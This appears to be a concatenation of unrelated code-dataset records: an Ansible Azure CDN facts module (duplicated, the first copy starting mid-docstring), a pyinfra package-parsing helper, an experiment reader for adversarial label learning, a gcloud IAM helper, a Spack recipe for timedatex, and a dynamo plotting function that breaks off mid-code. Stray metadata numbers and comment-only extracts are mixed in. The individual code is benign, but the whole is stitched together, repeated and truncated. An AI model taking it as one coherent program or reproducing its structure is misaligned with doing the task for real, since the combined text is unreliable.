sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. type: list sample: [ {"foo": "bar"} ] ''' from ansible.module_utils.azure_rm_common import AzureRMModuleBase try: from azure.mgmt.cdn.models import ErrorResponseException from azure.common import AzureHttpError from azure.mgmt.cdn import CdnManagementClient except: # handled in azure_rm_common pass import re AZURE_OBJECT_CLASS = 'profiles' class AzureRMCdnprofileFacts(AzureRMModuleBase): """Utility class to get Azure CDN profile facts""" def __init__(self): self.module_args = dict( name=dict(type='str'), resource_group=dict(type='str'), tags=dict(type='list') ) self.results = dict( changed=False, cdnprofiles=[] ) self.name = None self.resource_group = None self.tags = None self.cdn_client = None super(AzureRMCdnprofileFacts, self).__init__( derived_arg_spec=self.module_args, supports_tags=False, facts_module=True ) def exec_module(self, **kwargs): for key in self.module_args: setattr(self, key, kwargs[key]) self.cdn_client = self.get_cdn_client() if self.name and not self.resource_group: self.fail("Parameter error: resource group required when filtering by name.") if self.name: self.results['cdnprofiles'] = self.get_item() elif self.resource_group: self.results['cdnprofiles'] = self.list_resource_group() else: self.results['cdnprofiles'] = self.list_all() return self.results def get_item(self): """Get a single Azure CDN profile""" self.log('Get properties for {0}'.format(self.name)) item = None result = [] try: item = self.cdn_client.profiles.get( self.resource_group, self.name) except ErrorResponseException: pass if item and self.has_tags(item.tags, self.tags): result = [self.serialize_cdnprofile(item)] return result def list_resource_group(self): """Get all Azure CDN profiles within a resource group""" self.log('List all Azure CDNs within a resource group') try: response = self.cdn_client.profiles.list_by_resource_group( self.resource_group) except AzureHttpError as exc: self.fail('Failed to list all items - {0}'.format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def list_all(self): """Get all Azure CDN profiles within a subscription""" self.log('List all CDN profiles within a subscription') try: response = self.cdn_client.profiles.list() except Exception as exc: self.fail("Error listing all items - {0}".format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def serialize_cdnprofile(self, cdnprofile): ''' Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict ''' result = self.serialize_obj(cdnprofile, AZURE_OBJECT_CLASS) new_result = {} new_result['id'] = cdnprofile.id new_result['resource_group'] = re.sub('\\/.*', '', re.sub('.*resourcegroups\\/', '', result['id'])) new_result['name'] = cdnprofile.name new_result['type'] = cdnprofile.type new_result['location'] = cdnprofile.location new_result['resource_state'] = cdnprofile.resource_state new_result['sku'] = cdnprofile.sku.name new_result['provisioning_state'] = cdnprofile.provisioning_state new_result['tags'] = cdnprofile.tags return new_result def get_cdn_client(self): if not self.cdn_client: self.cdn_client = self.get_mgmt_svc_client(CdnManagementClient, base_url=self._cloud_environment.endpoints.resource_manager, api_version='2017-04-02') return self.cdn_client def main(): """Main module execution code path""" AzureRMCdnprofileFacts() if __name__ == '__main__': main()
<filename>library/azure_rm_cdnprofile_facts.py #!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" ''' EXAMPLES = ''' - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test ''' RETURN = ''' cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. type: list sample: [ {"foo": "bar"} ] ''' from ansible.module_utils.azure_rm_common import AzureRMModuleBase try: from azure.mgmt.cdn.models import ErrorResponseException from azure.common import AzureHttpError from azure.mgmt.cdn import CdnManagementClient except: # handled in azure_rm_common pass import re AZURE_OBJECT_CLASS = 'profiles' class AzureRMCdnprofileFacts(AzureRMModuleBase): """Utility class to get Azure CDN profile facts""" def __init__(self): self.module_args = dict( name=dict(type='str'), resource_group=dict(type='str'), tags=dict(type='list') ) self.results = dict( changed=False, cdnprofiles=[] ) self.name = None self.resource_group = None self.tags = None self.cdn_client = None super(AzureRMCdnprofileFacts, self).__init__( derived_arg_spec=self.module_args, supports_tags=False, facts_module=True ) def exec_module(self, **kwargs): for key in self.module_args: setattr(self, key, kwargs[key]) self.cdn_client = self.get_cdn_client() if self.name and not self.resource_group: self.fail("Parameter error: resource group required when filtering by name.") if self.name: self.results['cdnprofiles'] = self.get_item() elif self.resource_group: self.results['cdnprofiles'] = self.list_resource_group() else: self.results['cdnprofiles'] = self.list_all() return self.results def get_item(self): """Get a single Azure CDN profile""" self.log('Get properties for {0}'.format(self.name)) item = None result = [] try: item = self.cdn_client.profiles.get( self.resource_group, self.name) except ErrorResponseException: pass if item and self.has_tags(item.tags, self.tags): result = [self.serialize_cdnprofile(item)] return result def list_resource_group(self): """Get all Azure CDN profiles within a resource group""" self.log('List all Azure CDNs within a resource group') try: response = self.cdn_client.profiles.list_by_resource_group( self.resource_group) except AzureHttpError as exc: self.fail('Failed to list all items - {0}'.format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def list_all(self): """Get all Azure CDN profiles within a subscription""" self.log('List all CDN profiles within a subscription') try: response = self.cdn_client.profiles.list() except Exception as exc: self.fail("Error listing all items - {0}".format(str(exc))) results = [] for item in response: if self.has_tags(item.tags, self.tags): results.append(self.serialize_cdnprofile(item)) return results def serialize_cdnprofile(self, cdnprofile): ''' Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict ''' result = self.serialize_obj(cdnprofile, AZURE_OBJECT_CLASS) new_result = {} new_result['id'] = cdnprofile.id new_result['resource_group'] = re.sub('\\/.*', '', re.sub('.*resourcegroups\\/', '', result['id'])) new_result['name'] = cdnprofile.name new_result['type'] = cdnprofile.type new_result['location'] = cdnprofile.location new_result['resource_state'] = cdnprofile.resource_state new_result['sku'] = cdnprofile.sku.name new_result['provisioning_state'] = cdnprofile.provisioning_state new_result['tags'] = cdnprofile.tags return new_result def get_cdn_client(self): if not self.cdn_client: self.cdn_client = self.get_mgmt_svc_client(CdnManagementClient, base_url=self._cloud_environment.endpoints.resource_manager, api_version='2017-04-02') return self.cdn_client def main(): """Main module execution code path""" AzureRMCdnprofileFacts() if __name__ == '__main__': main()
en
0.63955
#!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str sample: /subscriptions/XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX/resourcegroups/cdntest/providers/Microsoft.Cdn/profiles/cdntest provisioning_state: description: - Provisioning status of the profile. type: str sample: Succeeded resource_state: description: - Resource status of the profile. type: str sample: Active sku: description: - The pricing tier, defines a CDN provider, feature list and rate of the CDN profile. type: str sample: standard_verizon type: description: - The type of the CDN profile. type: str sample: Microsoft.Cdn/profiles tags: description: - The tags of the CDN profile. type: list sample: [ {"foo": "bar"} ] # handled in azure_rm_common Utility class to get Azure CDN profile facts Get a single Azure CDN profile Get all Azure CDN profiles within a resource group Get all Azure CDN profiles within a subscription Convert a CDN profile object to dict. :param cdn: CDN profile object :return: dict Main module execution code path
2.109573
2
pyinfra/facts/util/packaging.py
ryan109/pyinfra
1
6627877
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts import re def parse_packages(regex, output, lower=True): packages = {} for line in output: matches = re.match(regex, line) if matches: # Sort out name name = matches.group(1) if lower: name = name.lower() packages.setdefault(name, set()) packages[name].add(matches.group(2)) return packages
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts import re def parse_packages(regex, output, lower=True): packages = {} for line in output: matches = re.match(regex, line) if matches: # Sort out name name = matches.group(1) if lower: name = name.lower() packages.setdefault(name, set()) packages[name].add(matches.group(2)) return packages
en
0.649417
# pyinfra # File: pyinfra/facts/util/packaging.py # Desc: common functions for packaging facts # Sort out name
2.746058
3
Adversarial Label Learning/experiments/default_reader.py
VTCSML/Adversarial-Label-Learning
1
6627878
<filename>Adversarial Label Learning/experiments/default_reader.py import numpy as np import json def create_weak_signal_view(path, views, load_and_process_data): """ :param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple """ data = load_and_process_data(path) train_data, train_labels = data['training_data'] val_data, val_labels = data['validation_data'] test_data, test_labels = data['test_data'] weak_signal_train_data = [] weak_signal_val_data = [] weak_signal_test_data = [] for i in range(len(views)): f = views[i] weak_signal_train_data.append(train_data[:, f:f+1]) weak_signal_val_data.append(val_data[:, f:f+1]) weak_signal_test_data.append(test_data[:, f:f+1]) weak_signal_data = [weak_signal_train_data, weak_signal_val_data, weak_signal_test_data] return data, weak_signal_data def run_experiment(run, save, views, datapath, load_and_process_data, savepath): """ :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none """ # set up your variables total_weak_signals = 3 num_experiments = 1 for i in range(num_experiments): data, weak_signal_data = create_weak_signal_view(datapath, views, load_and_process_data) for num_weak_signal in range(1, total_weak_signals + 1): adversarial_model, weak_model = run(data, weak_signal_data, num_weak_signal) print("Saving results to file...") # save(adversarial_model, weak_model, savepath) def run_dep_error_exp(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ # set up your variables num_experiments = 10 all_accuracy = [] baseline_accuracy = [] ge_accuracy = [] weak_signal_accuracy = [] data, weak_signal_data = data_and_weak_signal_data for num_weak_signal in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal + 1) all_accuracy.append(output['ALL']) baseline_accuracy.append(output['AVG']) ge_accuracy.append(output['GE']) weak_signal_accuracy.append(output['WS']) print("Saving results to file...") filename = path output = {} output ['ALL'] = all_accuracy output['GE'] = ge_accuracy output['AVG'] = baseline_accuracy output ['WS'] = weak_signal_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close() def run_bounds_experiment(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ data, weak_signal_data = data_and_weak_signal_data # set up your variables num_weak_signal = 3 num_experiments = 100 errors = [] accuracies = [] ineq_constraints = [] weak_signal_ub = [] weak_test_accuracy = [] bounds = np.linspace(0, 1, num_experiments) for i in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal, bounds[i]) errors.append(output['error_bound']) accuracies.append(output['test_accuracy']) ineq_constraints.append(output['ineq_constraint']) weak_signal_ub.append(output['weak_signal_ub']) weak_test_accuracy.append(output['weak_test_accuracy']) print("Saving results to file...") filename = path output = {} output ['Error bound'] = errors output['Accuracy'] = accuracies output['Ineq constraint'] = ineq_constraints output ['Weak_signal_ub'] = weak_signal_ub output['Weak_test_accuracy'] = weak_test_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close()
<filename>Adversarial Label Learning/experiments/default_reader.py import numpy as np import json def create_weak_signal_view(path, views, load_and_process_data): """ :param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple """ data = load_and_process_data(path) train_data, train_labels = data['training_data'] val_data, val_labels = data['validation_data'] test_data, test_labels = data['test_data'] weak_signal_train_data = [] weak_signal_val_data = [] weak_signal_test_data = [] for i in range(len(views)): f = views[i] weak_signal_train_data.append(train_data[:, f:f+1]) weak_signal_val_data.append(val_data[:, f:f+1]) weak_signal_test_data.append(test_data[:, f:f+1]) weak_signal_data = [weak_signal_train_data, weak_signal_val_data, weak_signal_test_data] return data, weak_signal_data def run_experiment(run, save, views, datapath, load_and_process_data, savepath): """ :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none """ # set up your variables total_weak_signals = 3 num_experiments = 1 for i in range(num_experiments): data, weak_signal_data = create_weak_signal_view(datapath, views, load_and_process_data) for num_weak_signal in range(1, total_weak_signals + 1): adversarial_model, weak_model = run(data, weak_signal_data, num_weak_signal) print("Saving results to file...") # save(adversarial_model, weak_model, savepath) def run_dep_error_exp(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ # set up your variables num_experiments = 10 all_accuracy = [] baseline_accuracy = [] ge_accuracy = [] weak_signal_accuracy = [] data, weak_signal_data = data_and_weak_signal_data for num_weak_signal in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal + 1) all_accuracy.append(output['ALL']) baseline_accuracy.append(output['AVG']) ge_accuracy.append(output['GE']) weak_signal_accuracy.append(output['WS']) print("Saving results to file...") filename = path output = {} output ['ALL'] = all_accuracy output['GE'] = ge_accuracy output['AVG'] = baseline_accuracy output ['WS'] = weak_signal_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close() def run_bounds_experiment(run, data_and_weak_signal_data, path): """ :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string """ data, weak_signal_data = data_and_weak_signal_data # set up your variables num_weak_signal = 3 num_experiments = 100 errors = [] accuracies = [] ineq_constraints = [] weak_signal_ub = [] weak_test_accuracy = [] bounds = np.linspace(0, 1, num_experiments) for i in range(num_experiments): output = run(data, weak_signal_data, num_weak_signal, bounds[i]) errors.append(output['error_bound']) accuracies.append(output['test_accuracy']) ineq_constraints.append(output['ineq_constraint']) weak_signal_ub.append(output['weak_signal_ub']) weak_test_accuracy.append(output['weak_test_accuracy']) print("Saving results to file...") filename = path output = {} output ['Error bound'] = errors output['Accuracy'] = accuracies output['Ineq constraint'] = ineq_constraints output ['Weak_signal_ub'] = weak_signal_ub output['Weak_test_accuracy'] = weak_test_accuracy with open(filename, 'w') as file: json.dump(output, file, indent=4, separators=(',', ':')) file.close()
en
0.679768
:param path: relative path to the dataset :type: string :param views: dictionary containing the index of the weak signals where the keys are numbered from 0 :type: dict :param load_and_process_data: method that loads the dataset and process it into a table form :type: function :return: tuple of data and weak signal data :return type: tuple :param run: method that runs real experiment given data :type: function :param save: method that saves experiment results to JSON file :type: function :param views: dictionary of indices for the weak signals :type: dict :param datapath: relative path to the dataset :type: string :param load_and_process_data: default method to load and process the given dataset :type: function :param savepath: relative path to save the results of the experiments :type: string :return: none # set up your variables # save(adversarial_model, weak_model, savepath) :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string # set up your variables :param run: method that runs real experiment given data :type: function :return: none :param data_and_weak_signal_data: tuple of data and weak signal data :type: tuple :param path: relative path to save the bounds experiment results :type: string # set up your variables
3.085178
3
gcloud/iam_auth/resource_helpers/base.py
springborland/bk-sops
1
6627879
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from iam import Resource, Subject from iam.contrib.tastypie.resource import IAMResourceHelper from gcloud.iam_auth.conf import SYSTEM_ID class SimpleSubjectEnvHelperMixin(object): def get_subject_for_alter_list(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_list(self, request, data): return {} def get_subject_for_alter_detail(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_detail(self, request, data): return {} class SimpleResourceHelper(SimpleSubjectEnvHelperMixin, IAMResourceHelper): def __init__(self, type, id_field, creator_field, name_field, *args, **kwargs): self.type = type self.id_field = id_field self.creator_field = creator_field self.name_field = name_field super().__init__(*args, **kwargs) def get_resources(self, bundle): attributes = {} if self.creator_field: attributes["iam_resource_owner"] = getattr(bundle.obj, self.creator_field) if self.name_field: attributes["name"] = getattr(bundle.obj, self.name_field) return [Resource(SYSTEM_ID, self.type, str(getattr(bundle.obj, self.id_field)), attributes)] def get_resources_id(self, bundle): return getattr(bundle.obj, self.id_field)
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from iam import Resource, Subject from iam.contrib.tastypie.resource import IAMResourceHelper from gcloud.iam_auth.conf import SYSTEM_ID class SimpleSubjectEnvHelperMixin(object): def get_subject_for_alter_list(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_list(self, request, data): return {} def get_subject_for_alter_detail(self, request, data): return Subject("user", request.user.username) def get_environment_for_alter_detail(self, request, data): return {} class SimpleResourceHelper(SimpleSubjectEnvHelperMixin, IAMResourceHelper): def __init__(self, type, id_field, creator_field, name_field, *args, **kwargs): self.type = type self.id_field = id_field self.creator_field = creator_field self.name_field = name_field super().__init__(*args, **kwargs) def get_resources(self, bundle): attributes = {} if self.creator_field: attributes["iam_resource_owner"] = getattr(bundle.obj, self.creator_field) if self.name_field: attributes["name"] = getattr(bundle.obj, self.name_field) return [Resource(SYSTEM_ID, self.type, str(getattr(bundle.obj, self.id_field)), attributes)] def get_resources_id(self, bundle): return getattr(bundle.obj, self.id_field)
en
0.864615
# -*- coding: utf-8 -*- Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
1.768611
2
var/spack/repos/builtin/packages/timedatex/package.py
player1537-forks/spack
11
6627880
<reponame>player1537-forks/spack<filename>var/spack/repos/builtin/packages/timedatex/package.py # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Timedatex(MakefilePackage): """timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.""" homepage = "https://github.com/mlichvar/timedatex" url = "https://github.com/mlichvar/timedatex/archive/v0.6.tar.gz" version('0.6', sha256='6e24c015769ee49a92bde3b1f167e25119068a00e377f9e4187a425c262ce964') version('0.5', sha256='bc54960bb9554bb2b34985ba2b8a78480db568c3c6a9d26f2ab34de1bc0aab11') version('0.4', sha256='204285eb03c6cec9ae1c7fdb99e7c996259ec5a918d72bf6bc28564a6f738d4a') depends_on('glib') def install(self, spec, prefix): make('install', 'prefix={0}'.format(prefix))
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Timedatex(MakefilePackage): """timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.""" homepage = "https://github.com/mlichvar/timedatex" url = "https://github.com/mlichvar/timedatex/archive/v0.6.tar.gz" version('0.6', sha256='6e24c015769ee49a92bde3b1f167e25119068a00e377f9e4187a425c262ce964') version('0.5', sha256='bc54960bb9554bb2b34985ba2b8a78480db568c3c6a9d26f2ab34de1bc0aab11') version('0.4', sha256='204285eb03c6cec9ae1c7fdb99e7c996259ec5a918d72bf6bc28564a6f738d4a') depends_on('glib') def install(self, spec, prefix): make('install', 'prefix={0}'.format(prefix))
en
0.788173
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) timedatex is a D-Bus service that implements the org.freedesktop.timedate1 interface. It can be used to read and set the system clock, the real-time clock (RTC), the system timezone, get a list of valid timezones, and enable or disable an NTP client installed on the system. It is a replacement for the systemd-timedated service.
2.073464
2
dynamo/plot/scPotential.py
davisidarta/dynamo-release
0
6627881
<reponame>davisidarta/dynamo-release from ..tools.utils import update_dict from .utils import save_fig def show_landscape(adata, Xgrid, Ygrid, Zgrid, basis="umap", save_show_or_return='show', save_kwargs={}, ): """Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. """ if "grid_Pot_" + basis in adata.uns.keys(): Xgrid_, Ygrid_, Zgrid_ = ( adata.uns["grid_Pot_" + basis]["Xgrid"], adata.uns["grid_Pot_" + basis]["Ygrid"], adata.uns["grid_Pot_" + basis]["Zgrid"], ) Xgrid = Xgrid_ if Xgrid is None else Xgrid Ygrid = Ygrid_ if Ygrid is None else Ygrid Zgrid = Zgrid_ if Zgrid is None else Zgrid from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter from matplotlib.colors import LightSource fig = plt.figure() ax = fig.gca(projection="3d") # Plot the surface. ls = LightSource(azdeg=0, altdeg=65) # Shade data, creating an rgb array. rgb = ls.shade(Zgrid, plt.cm.RdYlBu) surf = ax.plot_surface( Xgrid, Ygrid, Zgrid, cmap=cm.coolwarm, rstride=1, cstride=1, facecolors=rgb, linewidth=0, antialiased=False, ) # Customize the z axis. ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter("%.02f")) # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) ax.set_xlabel(basis + "_1") ax.set_ylabel(basis + "_2") ax.set_zlabel("U") if save_show_or_return == "save": s_kwargs = {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} s_kwargs = update_dict(s_kwargs, save_kwargs) save_fig(**s_kwargs) elif save_show_or_return == "show": plt.tight_layout() plt.show() elif save_show_or_return == "return": return ax # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... # % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
from ..tools.utils import update_dict from .utils import save_fig def show_landscape(adata, Xgrid, Ygrid, Zgrid, basis="umap", save_show_or_return='show', save_kwargs={}, ): """Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. """ if "grid_Pot_" + basis in adata.uns.keys(): Xgrid_, Ygrid_, Zgrid_ = ( adata.uns["grid_Pot_" + basis]["Xgrid"], adata.uns["grid_Pot_" + basis]["Ygrid"], adata.uns["grid_Pot_" + basis]["Zgrid"], ) Xgrid = Xgrid_ if Xgrid is None else Xgrid Ygrid = Ygrid_ if Ygrid is None else Ygrid Zgrid = Zgrid_ if Zgrid is None else Zgrid from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter from matplotlib.colors import LightSource fig = plt.figure() ax = fig.gca(projection="3d") # Plot the surface. ls = LightSource(azdeg=0, altdeg=65) # Shade 